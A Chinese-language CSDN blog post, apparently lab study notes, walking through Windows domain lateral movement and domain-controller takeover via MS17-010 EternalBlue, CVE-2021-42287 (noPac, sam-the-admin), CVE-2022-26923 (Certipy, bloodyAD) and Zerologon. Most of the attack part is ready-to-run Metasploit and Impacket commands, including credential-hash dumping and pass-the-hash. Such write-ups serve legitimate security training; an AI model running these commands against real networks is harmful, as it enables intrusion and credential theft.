第133天:内网安全-横向移动&域控提权&NetLogon&ADCS&PAC&KDC&永恒之蓝

已于 2024-08-21 21:20:25 修改
阅读量564 收藏 6
点赞数 8
文章标签: 安全
于 2024-08-21 15:25:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_71529930/article/details/141336385
版权

案例一:横向移动-系统漏洞-CVE-2017-0146

这个漏洞就是大家熟悉的ms17-010,这里主要学习cs发送到msf,并且msf正向连接后续

原因是cs只能支持漏洞检测,而msf上有很多exp可以利用

注意msf不能使用4.5版本的有bug

这里还是反弹权限,然后提权到system

设置监听器

 msf开启监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 0.0.0.0
set lport 8888
exploit

转发msf上

转发到刚才的会话上

msf成功上线

这是3网段的主机,所以可以连接到3网段所有主机,但是需要设置路由

run autoroute -p //查看当前路由表
run post/multi/manage/autoroute //添加当前路由表

会话放入后台

 这里利用ms17-010的时候反向没有办法上线的,因为内网的主机不出网,只有正向去连接他

首先先检测是否有该漏洞

use auxiliary/scanner/smb/smb_ms17_010

set rhosts 192.168.3.21-32 //设置扫描目标段

set threads 5 //设置扫描线程数

run

这里我的域控环境网段不是连续的,就扫描一个dc

可以利用,这里因为内网是不出网的所以需要借助已经拿到的机器,去控制目标主机,正向连接

use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp //正向连接上线
set rhost 192.168.3.25 //设置连接目标或者范围
run

本来是希望去控制域控主机的,但是域控主机似乎做了某种限制,这里我控制的是sqladmin

成功

msf正向连接中,设置了路由就可以,甚至不用上传木马,不知道是不是msf17-010的溢出不用

案例二:  横向移动-域控提权-CVE-2014-6324

在这篇文章里面复现过

第130天:内网安全-横向移动&PTH哈希&PTT 票据&PTK密匙&Kerberos&密码喷射-CSDN博客

案例三:横向移动-域控提权-CVE-2021-42287

前提条件:一个域内普通账号

影响版本:Windows基本全系列

这篇文章也复现过,这里还有不同的工具

第106天:权限提升-WIN 系统&AD域控&NetLogon&ADCS&PAC&KDC&CVE 漏洞_windows 提权漏洞补丁 ad域-CSDN博客

方法一:

同样先上线,代理转发

项目下载地址:
https://github.com/safebuffer/sam-the-admin

python3 sam_the_admin.py 域名/'域控主机账号:密码'  -dc-ip 域控ip -shell

python3 sam_the_admin.py 0day.org/'administrator:123.com' -dc-ip 192.168.3.142 -shell

查看获得的权限啊

方法二:

nopac下载地址: https://github.com/cube0x0/noPac

把这个文件导入到visual studio中

编译生成文件

在这个目录下会生成exe文件

 这里按理说应该设置代理在本地运行,我是linux系统没办法设置,直接上传本地运行

出现下面的提示代表有漏洞

noPac.exe scan -domain 0day.org -user jack -pass admin!@#45

生成票据

noPac.exe -domain 0day.org -user jack -pass admin!@#45 /dc 域控名  /mAccount 乱输一个用户名 -mPassword 乱输一个密码 /service 乱输一个服务 /ptt

noPac -domain 0day.org -user jack -pass admin!@#45 /dc owa2010sp3.0day.org /mAccount dadd /mPassword sdadasdsa /service cifs /ptt

PsExec \\owa2010cn-god.god.org cmd

现在查看票据里面就有一个administrator的票据

利用工具建立连接

psexec.exe \\域控主机名  cmd

案例四:WIN-域控提权-CVE-2022-26923

利用条件

一个域控内普通的账号密码

并且域控内有ca证书服务器

dnshostname不唯一

查看域内是否有证书服务器

certutil -config - -ping

没有的情况

如果有证书服务器

资源下载地址:GitHub - ly4k/Certipy: Tool for Active Directory Certificate Services enumeration and abuse 

安装必要的插件

python3 setup.py install

首先先申请一个证书

certipy req 'ip/域用户名:密码@域控计算机名' -target-ip 域控ip -ca CA服务器名 -template User -debug

certipy req '192.168.3.142/jack:admin!@#45@OWA2010SP3.0day.org' -target-ip 192.168.3.142 -ca 0day-OWA2010SP3-CA -template User -debug

检测证书

certipy auth -pfx jack.pfx -dc-ip 192.168.3.142 -debug

添加计算机账号

项目地址:GitCode - 全球开发者的开源社区,开源代码托管平台

python3 bloodyAD.py -d 域控名 -u 普通用户名 -p '普通用户密码' --host 域控ip addComputer 计算机名 '计算机密码'

python3 bloodyAD.py -d 0day.org -u jack -p 'admin!@#45' --host 192.168.3.142 addComputer pwnmachine 'CVEPassword1234*'

域控计算机中这台主机被成功添加了进去

这一步是需要将计算机名更新为与域控一样的名字,在这一步实验的过程中发现无法实现,原因是由于dnshostname在这个环境当中是唯一的

python3 bloodyAD.py -d 0day.org -u jack -p 'admin!@#45' --host 192.168.3.142 setAttribute 'CN=pwnmachine,CN=Computers,DC=0day,DC=org' dNSHostName '["OWA2010SP3.0day.org"]'

后续操作先看这篇文章把

第106天:权限提升-WIN 系统&AD域控&NetLogon&ADCS&PAC&KDC&CVE 漏洞_ad域控提权-CSDN博客

案例五:WIN-域控提权-CVE-2020-1472

影响范围以及利用条件

CVE-2020-1472 是继 MS17010 之后好用的 NetLogon 特权域控提权漏洞,
影响 Windows Server 2008R2 至 Windows Server 2019 的多个版本系统,
只要攻击者能访问到目标域控井且知道域控计算机名即可利用该漏洞 .
该漏洞不要求当前计算机在域内 , 也不要求当前计算机操作系统为 Windows

资源下载地址 

POC:https://github.com/SecuraBV/CVE-2020-1472
EXP:https://github.com/dirkjanm/CVE-2020-1472
Impacket:https://github.com/fortra/impacket

 获取计算机名,这里这条命令设置代理后,好像识别不出来这条命令无法执行,我只能设置在一个网段运行。。。,但是也有别的办法获取

nbtscan -v -h 192.168.3.21

 可以用这种方式获取计算机

 测试漏洞是否能够正常使用

python3 zerologon_tester.py OWA2010SP3 192.168.3.142

因为设置代理的话这里是一个一个数据包进行发送的,所以会比较慢。

清空密码凭证

python3 cve-2020-1472-exploit.py OWA2010SP3 192.168.3.142

利用impack套件导出hash

python3 secretsdump.py 0day.org/OWA2010SP3\$@192.168.3.142 -no-pass

导出hash,上面的admin是域控本地的admin而下面的是域控内的

 利用套件里面的wmiexec进行连接

python3 wmiexec.py Administrator@192.168.3.142 -hashes aad3b435b51404eeaad3b435b51404ee:afffeba176210fad4628f0524bfe1942

 

这中方式一般不要使用,会导致内网崩溃!!!,用完记得恢复hash

重置hash的方式:https://zhuanlan.zhihu.com/p/627855713

运行这三条命令

reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save

生成三个文件

这三个文件保存在本地,利用套件里面的secretdump文件恢复 ,但是他这个只能是在系统本地运行,系统不一定有python环境啊

python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

利用powershell执行这条命令

xiaojiesec
关注
  • 8
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
zer0dump:滥用CVE-2020-1472(Zerologon)接管域,然后修复本地存储的计算机帐户密码
03-20
Zerologon是一个关键的网络安全漏洞,主要影响运行Windows Server操作系统的域控制器。它存在于Netlogon远程协议中,该协议用于验证域控制器和域成员之间的身份验证过程。这个漏洞允许攻击者在没有有效凭据的情况下...
CVE-2020-1472:CVE-2020-1472亦称Zerologon的利用代码
03-18
它将尝试执行Netlogon身份验证绕过。修补域控制器后,检测脚本将在发送2000对RPC调用后放弃,从而认为目标不容易受到攻击(错误的可能性为0.04%)。 仅当域控制器使用Active Directory中存储的密码来验证登录尝试而...
CVE-2020-1472:CVE-2020-1472的测试工具
03-16
ZeroLogon测试脚本 使用Impacket库测试Zerologon漏洞(CVE-2020-1472)的漏洞的Python脚本。 它尝试执行Netlogon身份验证绕过。... 给定一个名为IP地址为1.2.3.4名为EXAMPLE-DC的域控制器,请如下
发现是没有netlogon和sysvol共享.docx
06-17
#### 一、Netlogon与Sysvol共享介绍 - **Netlogon**:在Windows Active Directory环境中,Netlogon服务主要负责处理域控制器之间的身份验证和复制请求。它确保所有域控制器能够保持同步,并且用户能够在网络上进行...
CVE-2020-1472 NetLogon 特权提升漏洞1
08-03
CVE-2020-1472 NetLogon 特权提升漏洞1
AI安全-文生图
深度安全实验室
08-15 422
AI安全-文生图
探索802.1X:构筑安全网络的认证之盾
XINERTEL的博客
08-21 672
首先,让我们了解一下什么是802.1x。802.1x是一个基于端口的网络访问控制机制,由IEEE(电气电子工程师学会)开发,属于IEEE 802.1标准家族。它的主要作用是通过认证管理用户和设备对网络的访问权限。更通俗地说,802.1x就像是网络的门卫,负责检查每一个试图进入网络的设备或用户的身份,只有通过认证的合法用户才能进入。这不仅可以防止未授权的设备接入,还可以确保网络的安全和稳定。
CISAW安全集成和别的类型有什么区别
2402_84109700的博客
08-21 127
对于CISAW安全运维方向,申请人须通过相应的考试,并且满足以下任一条件:具有硕士及以上学位并有2年信息安全相关工作经验,其中至少1年与安全运维相关;其次,CISAW的安全集成方向侧重于评估申请人在信息系统安全集成方面的基础知识和技能的掌握程度,以及运用这些知识分析和解决安全集成问题的能力。- 对于CISAW安全集成方向,申请人同样需要通过相应考试,并满足类似的工作经验要求,但针对的是安全集成领域的专业经验。- 对于CISAW安全管理方向,报名条件与前两者相似,但侧重于风险管理专业方向的相关工作经验。
如何选择较为安全的第三方依赖版本?
极客星云-CSDN博客
08-16 182
本篇博文分享如何选择较为安全的第三方依赖版本的方法。
SD-WAN安全:在灵活性与安全性之间找到平衡
A526847的博客
08-21 298
随着企业业务的不断扩展和数字化转型的加速,网络架构的灵活性和安全性成为了企业关注的重点。SD-WAN(软件定义广域网)作为一种新兴的网络架构,通过软件定义和虚拟化技术,为企业提供了更灵活、可靠、经济高效的广域网连接方案。然而,在追求灵活性的同时,如何确保网络的安全性,成为了SD-WAN应用中的一大挑战。本文将探讨SD-WAN如何在灵活性与安全性之间找到平衡。
车辆电子围栏系统:守护爱车安全的智能新防线
2301_81759256的博客
08-20 374
在未来,随着技术的不断进步和应用的持续深化,我们有理由相信,车辆电子围栏系统将会为更多车主带来安心与便捷,共同守护每一段旅程的平安与美好。车主可以根据自己的实际需求,自由设定围栏的范围大小、形状及预警方式,无论是家庭住址、公司停车位还是孩子的学校周边,都能成为保护爱车的安全区域。一旦车辆跨越这个预设的“围栏”,系统便会立即触发警报,通过手机APP、短信或电话等多种方式通知车主,实现对车辆位置的实时监控与异常行为的即时响应。其中,车辆电子围栏系统作为一项创新的安全技术,正悄然成为车主们守护爱车安全的新宠。
建筑楼宇电气安全与能效管理
ACRELKY的博客
08-21 546
这些电气安全事故隐患包括过载、缺相、漏电、三相不平衡、跨接配电线路、零线地线混肴、线路老化、接触不良。楼宇建筑电气安全与能效管理系统与传统的电气监控系统截然不同,是一种基于泛终端的具有互联网功能的排除电气安全事故隐患的技术方案,是管理创新与现代信息技术融合的全新概念,能实现电气监测、控制、运行维护的全过程、自动化、一体化管理,能克服传统电气安全监控系统的缺陷,及时有效地发现和消除“孤岛”管理模式下存在的电气安全事隐患,提高工作效率、降低楼宇建筑配电系统的运行维护成本,具有显著的经济效益和社会效益。
网络安全漏洞防护技术原理与应用
weixin_49171105的博客
08-21 299
定义:又称脆弱性,简称漏洞。一般是致使网络信息系统安全策略相冲突的缺陷(安全隐患)影响:机密性受损、完整性破坏、可用性降低、抗抵赖性缺失、可控制性下降、真实性不保等范围:网络信息系统硬件层、软硬协同层、系统层、数据层、应用层、业务层、人机交互层普通漏洞:指相关漏洞信息已广泛公开,安全厂商已有解决修补方案零日漏洞:特指系统或软件中新发现的、尚未提供补丁的漏洞。常被用于实施定向攻击。
API容易被攻击,如何做好API安全
dexunyun的博客
08-20 633
当前,API已成为全球重要 IT 基础设施的基石。由此,了解API安全风险以及采用WAAP解决方案等防护措施等,帮助企业构筑API安全防线,确保API安全,为维护企业安全以及业务的正常运行,确保企业可持续发展有着重要的意义。
银行总分支文件分发系统:在安全与效率之间找到平衡
文件数据安全交换
08-21 529
飞驰云联是中国领先的数据安全传输解决方案提供商,长期专注于安全可控、性能卓越的数据传输技术和解决方案,公司产品和方案覆盖了跨网跨区域的数据安全交换、供应链数据安全传输、数据传输过程的防泄漏、FTP的增强和国产化替代、文件传输自动化和传输集成等各种数据传输场景。支持自定义人工审批流程,包括多级、多人审批,会签、或签、转签,并支持与OA、BPM审批系统集成,自动邮件通知,确保文件外发安全合规、审批灵活便捷。业务报告:各种业务的月度、季度和年度报告,包括贷款、存款、投资等业务的统计数据;
智能巡检新突破:防爆巡检机器人打造油气化工安全高效新标杆
最新发布
jxlyyr的博客
08-21 609
相比之下,智能巡检方案成本和效率更优,可代替人工在危险环境中巡检,搭载巡检设备和数据分析系统,实时传输画面和分析设备运行情况,预警异常并远程报警,提前遏制安全隐患,且能24小时移动巡检。:在钢铁冶金的高温、粉尘环境中,防爆巡检机器人可自主巡检设备状态,如高炉、转炉的冷却水系统、除尘设备等,通过红外测温、图像识别等技术,及时发现设备异常,预防重大事故。能在石油储罐区、输油管道及泵房等易燃易爆环境中,实时监测设备运行状态,如温度、压力、泄漏等,及时发现安全隐患,并通过AI算法进行预警,减少安全事故的发生。
IP SSL证书的未来趋势:适应不断变化的安全挑战
2401_86337938的博客
08-21 563
随着网络攻击手段的不断进化和用户对隐私保护意识的增强,IP SSL证书作为保障网络安全的关键组件之一,也在不断地发展和完善。随着网络安全意识的提高和法规对HTTPS采用的推动,IP SSL证书的应用范围将进一步扩大。为了应对不断升级的安全威胁,IP SSL证书将采用更强大的加密算法,以确保数据传输的安全性。未来的IP SSL证书可能会集成更多的身份验证机制,比如多因素认证(MFA),以增强证书的整体安全性。随着物联网设备数量的激增,IP SSL证书也将需要适应这些设备的安全需求,确保它们之间的通信安全
AIM-R100:智能守护,末端回路漏电监测新卫士——精准预警,安全无忧
acrel002的博客
08-21 232
AIM-R100支持RS485通讯协议,轻松实现设备间的组网连接,构建起强大的远程监控网络。无论是大型企业还是复杂的工业园区,都能通过这一智能网络实现对电气安全状况的全面、实时、远程监控,让电气安全管理迈入智能化、自动化的新时代。面对紧急情况,AIM-R100迅速响应,通过其1路继电器输出功能,实现报警信号的即时输出,与紧急切断装置联动,迅速切断故障电路,将事故风险降至最低。AIM-R100内置了剩余电流互感器的断线和短路监测功能,一旦发现潜在故障,立即触发报警机制,有效防止因设备故障引发的安全事故。
【第69课】Java安全&JWT攻防&Swagger自动化&算法&签名&密匙&Druid未授权
Lucker_YYY的博客
08-21 588
免责声明本文发布的工具和脚本,仅用作测试和学习研究,禁止用于商业用途,不能保证其合法性,准确性,完整性和有效性,请根据情况自行判断。如果任何单位或个人认为该项目的脚本可能涉嫌侵犯其权利,则应及时通知并提供身份证明,所有权证明,我们将在收到认证文件后删除相关内容。文中所涉及的技术、思路及工具等相关知识仅供安全为目的的学习使用,任何人不得将其应用于非法用途及盈利等目的,间接使用文章中的任何工具、思路及技术,我方对于由此引起的法律后果概不负责。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值